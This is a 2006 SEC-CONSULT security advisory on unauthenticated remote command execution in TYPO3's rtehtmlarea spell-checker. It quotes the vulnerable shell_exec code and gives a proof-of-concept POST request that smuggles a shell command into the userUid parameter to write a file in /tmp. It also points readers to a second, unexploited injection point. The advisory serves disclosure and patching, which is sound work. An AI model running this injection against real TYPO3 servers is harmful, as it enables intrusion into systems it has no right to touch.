Remote Command Execution in TYPO3

SEC-CONSULT Security Advisory < 20061220-0>

=======================================================================

title: Remote Command Execution in TYPO3

program: TYPO3 Content Management System

vulnerable version: 4.0.0 - 4.0.3

3.7 and 3.8 with rtehtmlarea extension

4.1beta

impact: critical

homepage: www.typo3.com

found: 2006-11-21

by: D. Fabian / SEC-CONSULT / www.sec-consult.com

J. Greil / SEC-CONSULT / www.sec-consult.com

=======================================================================

 

vendor description:

---------------

 

TYPO3 is a free Open Source content management system for enterprise

purposes on the web and in intranets. It offers full flexibility and

extendability while featuring an accomplished set of ready-made

interfaces, functions and modules.

 

[Source: www.typo3.com]

 

 

vulnerability overview:

---------------

 

In version 4.0 and above, TYPO3 includes a sysext named rtehtmlarea.

The extension can optionally also be installed on TYPO3 versions below

4.0. This RTE HTML Editor allows spell checking, for which it uses the

command line tool 'aspell'.

 

When this program is called, unvalidated user input is used as argument

to the system call. Login to the backend is /not/ required to exploit

this vulnerability.

 

This allows an attacker to execute arbitrary commands on the target

system.

 

 

vulnerability details:

---------------

 

The affected script resides in /typo3/sysext/rtehtmlarea/htmlarea/

plugins/SpellChecker/spell-check-logic.php which calls the vulnerable

script /typo3/sysext/rtehtmlarea/pi1/class.tx_rtehtmlarea_pi1.php.

It requires a GET parameter id with the pageid of an existing page.

When the POST parameter cmd is set to learn, the parameter userUid is

not validated and can be used by an attacker to inject code.

 

Here is the vulnerable code (line 208):

--- code ---
$AspellCommand = 'cat ' . $tmpFileName . ' | ' . $this->AspellDirectory
 . ' -a --mode=none' . $this->personalDictsArg . ' --lang=' .
 $this->dictionary . ' --encoding=' . $this->parserCharset . ' 2>&1';
print $AspellCommand . "\n";
print shell_exec($AspellCommand);
--- /code ---

 

There seems to be a second command execution vulnerability in the same

file in line 365. It is left as a task to the reader to exploit that

flaw.

 

For TYPO3 versions < 4.0, the rtehtmlarea extension is probably located

at /typo3/ext.

 

 

proof of concept:

---------------

 

Here is a sample POST request that writes a file 'shell.txt' into /tmp:

--- post request ---
POST /typo3/sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell-
check-logic.php?id=1 HTTP/1.1
Host: www.typo3host.abc
User-Agent: none
Content-Type: application/x-www-form-urlencoded
Content-Length: 111

psell_mode=fast&to_p_dict=1&cmd=learn&userUid=test;+echo+'shell'+>+
/tmp/shell.txt+%23&enablePersonalDicts=true
--- /post request ---

 

 

vulnerable versions:

---------------

 

Versions 4.0 - 4.0.3 as well as 4.1beta seem to be vulnerable to the

described attack. Also vulnerable are versions 3.7 and 3.8 if the

rtehtmlarea extension is installed.

The issue has been resolved in version 4.0.4.

 

 

vendor status:

---------------

vendor notified: 2006-12-07

vendor response: 2006-12-07

patch available: 2006-12-20

coordinated disclosure: 2006-12-20

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Unternehmensberatung GmbH

 

Office Vienna

Blindengasse 3

A-1080 Wien

Austria

 

Tel.: +43 / 1 / 890 30 43 - 0

Fax.: +43 / 1 / 890 30 43 - 15

Mail: research at sec-consult dot com

www.sec-consult.com

 

EOF Daniel Fabian / @2006